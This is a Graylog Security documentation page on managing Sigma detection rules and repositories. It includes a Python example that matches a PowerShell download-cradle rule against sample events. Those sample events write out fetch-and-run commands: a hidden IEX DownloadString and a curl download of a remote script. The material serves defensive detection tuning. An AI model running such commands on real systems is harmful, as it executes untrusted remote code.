Manage Sigma Rules

The following article exclusively pertains to a Graylog Security feature or functionality. Graylog Security is a part of the Graylog centralized log management platform and requires a separate license. Contact the Graylog Sales team for more information on this product.

Sigma rules and Sigma Correlation help detect threats by matching log events against known attack patterns. After you add rules to Graylog, you can manage and maintain them using Graylog’s built-in tools to ensure your detection logic stays organized, up to date, and aligned with your monitoring strategy.

This article focuses on the management aspects of Sigma rules and repositories within Graylog.

Prerequisites

Before proceeding, ensure that the following prerequisites are met:

  • You must have a Graylog Security license.

  • Graylog 4.3 or higher is required for Sigma rules.

  • Graylog Illuminate is recommended for use with Sigma rules and Sigma Correlation.

Manage Rules

All imported and user-defined Sigma rules are displayed in a table on the Sigma Rules page. Each entry includes key metadata such as the rule’s description, operational status, and configuration parameters. The Enabled column contains a toggle switch that allows you to enable or disable each rule.

  • Enabled: Rule runs on its defined schedule.

  • Disabled: Rule is inactive and does not evaluate logs or generate alerts.

To manage your Sigma rules:

  1. Navigate to the Security layout in Graylog.

  2. Go to Sigma Rules > Rules.

  3. Select the ellipsis menu next to the rule and choose an action from the menu. The following actions are available:

Search Logs

Each Sigma rule imported into Graylog can also be executed directly as a search. This action opens a search view built from the rule's logic. It is useful for reviewing real-time or historical matches against the rule conditions, and it helps both when writing new rules and when trying to understand existing ones.

Hint: Use the Search Logs option before enabling a Sigma rule to check what it matches, how noisy it is, and how expensive its query is, so that tuning happens before the rule starts generating alerts.

Edit Rule

To modify an existing rule:

  1. Click the ellipsis menu next to the rule.

  2. Select Edit from the menu options.

  3. Update YAML definitions, metadata, associated streams, or execution schedules.

  4. Click Save changes to update the rule.

Hint: Sigma rules from Illuminate packs derive their rule logic and configuration settings from the content packs, so you can only edit these rules to add notifications and filters but not the actual rule logic.

Clone Rule

If you want to create a variant of an existing rule:

  1. Click the ellipsis menu next to the rule.

  2. Choose Clone from the menu options.

  3. Edit the cloned rule’s contents to customize it.

  4. Give the new rule unique metadata (at minimum a distinct title) or its own correlation logic, then click the Add rule button to save it.

This capability is useful for adapting standard rules to specific environments. The new rule can be modified independently without affecting the original.
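The Search Logs dry run and the Clone action above both operate on the rule's detection logic. The following Python is an added example, not Graylog's Sigma engine or any code from the original page: it evaluates a Sigma-style rule (mirrored as a Python dict with the same title, id, logsource, detection and condition layout a downloaded .yaml carries) against a handful of constructed process-creation events, then derives an independent clone with a fresh id and an exclusion filter for an environment-specific false positive. The rule, its id, the field names and the sample events are all constructed, and only a subset of Sigma (string modifiers, list values, and/or/not conditions) is implemented.

```python
"""Minimal Sigma-style evaluator and clone helper (added example, not Graylog code).
Handles contains/startswith/endswith, list values (OR), and and/or/not conditions."""
import copy
import uuid

# Python mirror of a Sigma rule as downloaded in .yaml form; title, id and field names are constructed.
RULE = {
    "title": "PowerShell Download Cradle",
    "id": "00000000-0000-4000-8000-000000000001",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {"Image|endswith": "\\powershell.exe",
                      "CommandLine|contains": ["DownloadString", "Invoke-WebRequest", "iwr "]},
        "condition": "selection",
    },
}

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
EVENTS = [  # constructed process_creation events standing in for Graylog messages
    {"Image": PS, "User": "CORP\\jdoe", "CommandLine":
     "powershell -nop -w hidden IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"},
    {"Image": PS, "User": "CORP\\jdoe", "CommandLine": "powershell -File C:\\Scripts\\patch-check.ps1"},
    {"Image": PS, "User": "NT AUTHORITY\\SYSTEM", "CommandLine":
     "powershell Invoke-WebRequest -Uri https://updates.example.internal/manifest.json"},
    {"Image": "C:\\Windows\\System32\\cmd.exe", "User": "CORP\\jdoe",
     "CommandLine": "cmd /c curl http://203.0.113.5/a.ps1 -o a.ps1"},
]

def _match_value(actual, modifier, expected):
    """One Sigma comparison; Sigma string matching is case-insensitive."""
    if actual is None:
        return False
    a, e = str(actual).lower(), str(expected).lower()
    ops = {"": a == e, "contains": e in a, "startswith": a.startswith(e), "endswith": a.endswith(e)}
    if modifier not in ops:
        raise ValueError(f"unsupported modifier {modifier!r}")
    return ops[modifier]

def _match_selection(selection, event):
    """Fields in a selection are ANDed; a list of values for one field is ORed."""
    for key, expected in selection.items():
        field, _, modifier = key.partition("|")
        values = expected if isinstance(expected, list) else [expected]
        if not any(_match_value(event.get(field), modifier, v) for v in values):
            return False
    return True

def evaluate(rule, event):
    """Evaluate the condition against one event; 'and' binds tighter than 'or'."""
    det = rule["detection"]
    tokens = det["condition"].split()
    pos = 0
    def unary():
        nonlocal pos
        tok = tokens[pos] if pos < len(tokens) else None
        pos += 1
        if tok == "not":
            return not unary()
        if tok is None or tok == "condition" or tok not in det:
            raise ValueError(f"bad or missing selection {tok!r} in condition")
        return _match_selection(det[tok], event)
    def binary(op):
        nonlocal pos
        operand = unary if op == "and" else (lambda: binary("and"))
        val = operand()
        while pos < len(tokens) and tokens[pos] == op:
            pos += 1
            rhs = operand()  # always evaluated, so unknown names error even after a short-circuit
            val = (val and rhs) if op == "and" else (val or rhs)
        return val
    result = binary("or")
    if pos != len(tokens):
        raise ValueError("trailing tokens in condition")
    return result

def search_logs(rule, events):
    """Dry run of a rule: the events it would match, to review before enabling it."""
    return [ev for ev in events if evaluate(rule, ev)]

def clone_rule(rule, title, filter_name=None, filter_selection=None):
    """Independent variant: deep copy, fresh id, back-link to the source rule and,
    optionally, an exclusion filter ANDed onto the condition."""
    new = copy.deepcopy(rule)
    new["title"] = title
    new["id"] = str(uuid.uuid4())
    new["related"] = [{"id": rule["id"], "type": "derived"}]
    if filter_name:
        det = new["detection"]
        if " or " in det["condition"]:  # no parentheses support, so 'and not' would bind to the last term only
            raise ValueError("cannot safely append a filter to an 'or' condition")
        det[filter_name] = filter_selection
        det["condition"] = f"{det['condition']} and not {filter_name}"
    return new

# Tuned variant for an environment where SYSTEM legitimately fetches an internal update manifest.
TUNED = clone_rule(RULE, "PowerShell Download Cradle (tuned)", "filter_updater",
                   {"User": "NT AUTHORITY\\SYSTEM", "CommandLine|contains": "updates.example.internal"})

if __name__ == "__main__":
    for r in (RULE, TUNED):
        print(r["title"], "->", [ev["User"] for ev in search_logs(r, EVENTS)])
```

Running the script lists which constructed users each rule matches: the original fires on both the download cradle and the SYSTEM updater, the tuned clone only on the cradle, and the original rule's condition and id are left untouched, which is the independence the Clone action gives you in Graylog. The clone refuses to append a filter to a condition containing "or", because without parentheses the added "and not" would only narrow the last term; a real Sigma rule would use parentheses or a separate selection instead.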

Download Rule

  1. Click the ellipsis menu next to the rule.

  2. Select Download from the menu options. The rule is downloaded as a .yaml file.

This functionality is useful for backups, offline review, transferring rules between environments, or sharing with teams.

Edit Event Definition

Every Sigma rule is automatically associated with an event definition when it is created. To edit that event definition:

  1. Click the ellipsis menu next to the rule.

  2. Select Edit Event Definition from the menu options. This action opens the associated event definition used for alerting when the rule is triggered.

  3. Modify remediation notes attached to the event definition, add custom fields, and edit notification settings.

Warning: Do not change the condition type of an event definition. This action breaks the connection between the Sigma rule and the event definition, and the rule no longer operates correctly. Changing the event type to either Filter & Aggregation or Correlation creates a completely different event definition.

Delete Rule

This action permanently deletes the rule from Graylog. Before deletion, Graylog prompts for confirmation.

Warning: Deleting a rule also removes its detection logic and disables any linked alerts.

Bulk Actions

Use the check boxes on the left to select multiple rules, then apply bulk actions. The following functionality is available for bulk actions: enable, disable, add notification, download, and delete.

Hint: The bulk Add Notification action is strictly additive: the selected notification is added to each chosen rule, and any notifications those rules already have remain in place.

Manage Repositories

The Sigma Repos tab lists the imported repositories. To act on a single repository, click the ellipsis menu to the right of it and select one of the following actions:

  • Edit: Update the branch or directories from which to source rules.

  • Import All: Imports all valid rules from a repository into Graylog.

  • Refresh: Refreshes the list of available rules, for example after rules have been added or changed in the Git repository.

  • Delete: Deletes the repository metadata from Graylog. Rules from that repository can no longer be imported, but any rules that were already imported remain. Delete can also be done in bulk: select multiple repository check boxes, click the Bulk Actions button, then select Delete.

All added repositories are shown in the Sigma Rules GIT Repos page.

Further Reading

Explore the following additional resources and recommended readings to expand your knowledge on related topics: